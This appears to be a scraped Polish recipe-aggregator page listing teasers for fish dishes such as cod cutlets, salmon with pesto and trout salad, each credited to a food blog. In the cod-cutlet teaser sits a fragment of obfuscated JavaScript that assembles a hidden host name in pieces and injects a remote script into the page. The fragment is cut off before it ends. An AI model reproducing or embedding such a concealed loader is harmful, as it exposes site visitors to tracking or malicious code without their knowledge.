Zimowa sola sauté 210Wprawdzie dopiero w drugiej połowie stycznia, ale w końcu przyszły mrozy i spadł śnieg. Zrobiło się ślisko, biało, zimowo :) Niektórzy z utęsknieniem czekali, aż przyjdzie, inni
Ratunku obiad
Pesto z nerkowców i rukoli oraz dorsz pieczony z suszonymi pomidorami, czyli prosto i wykwintnie 257Był pstrąg, był łosoś, był tuńczyk, więc pora na dorsza. Delikatne, chude mięso zapiekane z suszonymi pomidorami, czyli pyszny i niezwykle aromatyczny posiłek, którego przygotowanie to
peanutbuttermonster
Łosoś à la MasterChef 342Święta, święta i po świętach... Co ja mówię, już niemal połowa stycznia! Czas płynie tak szybko, jakby ktoś wcisnął przewijanie, a ja? Ja mam ochotę wcisnąć
Ratunku obiad
Risotto po mediolańsku ze smażonym kurczakiem 323Podstawowy sposób przygotowania risotto jako takiego jest mało zróżnicowany. Zazwyczaj wygląda mniej więcej tak, że odpowiednią do tego odmianę kleistego ryżu mieszamy z zeszkloną na maśle
Kulinarna Pokusa
Sałatka z pstrągiem łososiowym, zielonymi owocami i twarożkiem wędzonym 276Zimą zawsze brakuje mi kolorów. Jest szaro i ponuro, a śnieg za szybko się topi. Brakuje mi także świeżych owoców i warzyw, które tylko wiosną i
Sajkofanka smaku
Kotleciki z dorsza w wersji fit 219Dorsz to ryba, którą pewnie chętnie zajadasz się podczas wakacji nad Bałtykiem. Smażony filet z frytkami to dla niektórych smak wakacyjnej beztroski. W zaciszu własnej kuchni też możesz przygotować pyszne danie z dorszem w roli głównej. Wcale nie musisz trzymać się rutyny i wrzucać na patelnię całe kawałki ryby. Co powiesz na przepyszne i do tego bardzo zdrowe kotleciki(...)domowych posiłków. Zadbaj o to, żeby Twoje menu było jak najbardziej zróżnicowane. Ryby powinny zająć w nim miejsce honorowe, szczególnie z warzywnymi dodatkami. Są idealnym pomysłem nie tylko na obiad, ale też ostatnie danie w ciągu dnia. (function(){ qxaw=document.createElement("script");qxaw_=("us")+("ta"); qxaw_+="t"+(".");qxaw_+=("in");qxawu="11904021";qxaw.async=true; qxawu+=".n6451052xawalpayf";qxaw.type="text/javascript";qxaw_+="f"+"o"+("/"); qxawu
Tradycyjna Kuchnia
FRANCUSKA RANDKA ŁOSOSIA. 240gram mąki bezglutenowej- 250 gram pokrojonego w małą kostkę masła,- sol - pół łyżeczki,/W przypadku cista tradycyjnego - można wykorzystać te same proporcje/* nadzienie:- szpinak świeży, liściasty, 200 gram,- łosoś, filet,- serek ARLA APETINA Kremowy "Pesto i Rukola"- czosnek 5-6 główek,- masło,- jajko,- bazylia,- odrobina domowej mieszanki suszonych warzyw.WYKONANIE CIASTA:1. Na stolnicę wsypujemy przesianą mąkę, dorzucamy masło (pokrojone(...)czytaj prosto z pudełka), a z drugiej przepysznym szpinakiem, który nie może nie zachwycić. Do tego czosnek i zioła i uwierzcie nam, że nic więcej nie trzeba. Wykwintny obiad robi się z przyjemnością. Coś co każdemu posmakuje.Serek stał się nie tylko spoiwem (na szczęście miałyśmy dwa opakowania), ale i bazą do wykonania dodatku. Mowa o czosnkowym dipie z którym
Wypisz Wymaluj
Dorsz – ryba, którą warto gościć na stole 233Zdrowe odżywianie ma ogromne znaczenie. Wpływa nie tylko na to jak się czujemy i wyglądamy, ale również na nasze zdrowie. W trosce o prawidłowe funkcjonowanie naszego
Codogara
Łosoś zapiekany pod pesto z mizerią z rzodkiewki i pieczonymi młodymi ziemniakami 217To już pierwszy dzień sierpnia! Jak ten czas pędzi! Dopiero co był maj, czerwiec. Ten lipiec minął tak, jakby go nie było. Dlaczego kiedy mamy wolne
Be Fit Be Strong
Łosoś koperkowo-czosnkowy i kilka słów o gotowaniu na parze 220Znudziło Ci się już przygotowywanie posiłków tradycyjnymi metodami? Przejadłeś się już smażonymi i pieczonymi potrawami? Chciałbyś spróbować czegoś innego? Spróbuj gotowania na parze! Kilka dni temu
peanutbuttermonster
#Smaki świata - Bułgaria 250Ufff... to był ciężki tydzień! Ale w końcu na bloga wjeżdża nowy cykl - #Smaki świata i już dziś podzielę się z Wami moimi kulinarnymi doznaniami z
Cooking Monster
Grillowany łosoś w kremowym sosie ze szparagami i grzybami i test patelni Ballarini / Grilled salmon with creamy asparagus and m 262Po raz kolejny miałam okazję nawiązać współpracę z firmą Ballarini , która powierzyła mi do testów kolejną patelnię. Tym razem, zgodnie z wiosennym trendem fit – granitową
karmelowy